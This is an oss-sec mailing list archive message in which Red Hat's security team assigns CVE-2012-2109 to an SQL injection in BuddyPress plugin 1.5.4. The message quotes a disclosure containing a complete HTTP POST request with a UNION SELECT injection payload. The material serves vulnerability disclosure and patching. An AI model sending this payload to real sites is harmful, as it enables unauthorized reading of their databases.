oss-sec mailing list archives
Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4
From: Kurt Seifried <kseifried () redhat com>
Date: Mon, 16 Apr 2012 13:36:14 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 04/15/2012 03:05 AM, Henri Salo wrote:
Hello, Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin SQL-injection. Affected: 1.5.4 Fixed: 1.5.5 Vendor: http://buddypress.org/2012/03/buddypress-1-5-5/ OSVDB: http://osvdb.org/show/osvdb/80763 Changelog: http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to say about this issue)
Please use CVE-2012-2109for this issue.
http://seclists.org/bugtraq/2012/Apr/4 """ Hi, I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to last version, if you haven't done it yet. Example of POST message with sql injection is below. POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: example.com Accept: */* Referer: http://example.com/activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
"""
- Henri Salo
- -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPjHSuAAoJEBYNRVNeJnmTudoP/2bj2DvLJ+omeUy1DbIrAw1f 5ar2lOrhYHt4UjOu3Nddx3Z7JuxL6ee7GjmdZ+AZwAXe1Di4Caho/n1gKP5dLTjc HuIOgnNX7frGJvGLZn0mqQSM4CLg2HXLPZdk1w5P2eINMA6Gchb1ZmzGd3iPVPPK +hW+K/4EkMOGvnfz1FU34IA8vgyzvre98ZVn7vRli7b2Hvu9cH49+9txqftMMh1u tLO9lpjuuI+tzDlnm6FuTIEBX6zxcIMvdWEEXwKAjTmXeXgs3re/PvAV4TiqYGR2 gVquLgZupX534PGDDvJLOyfcLICoHCj/PZ1hTCvyVMbgtuoFNoMeUARxlHR6dzgD 00afqpScIvNji+Q/vSvQ7jU559+IAyq9Z0Mz+wYut3elcUi8GIkdJlt98xUqE4b+ M2ZPzkF+LnFTMBaIjgzjY1wqgmhyxQhaUDYXfO2qsAEi39oLVZpVNr+uAWnpGY58 YV5ilvmgqdILJt4cyYdc/aE3hrnsexGQntwGE8CeBUefqdq2LPEene8O2/rfoYkn hSH9rtUN3sXIVClo7TsBX3ZGbi50CtH7FgHBzUrDRAflRkK1nSw8ZMMJy/cjPtz9 BfneEin1fctogvfo1L9xO9Lx4Z3G7gK/7xKXkhqiXsfVgwdBb3liUWo0LS2qcOy6 StSxvvLRwvnhFkQJlDrh =+3UG -----END PGP SIGNATURE-----
Current thread:
- CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Henri Salo (Apr 15)
- Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Kurt Seifried (Apr 16)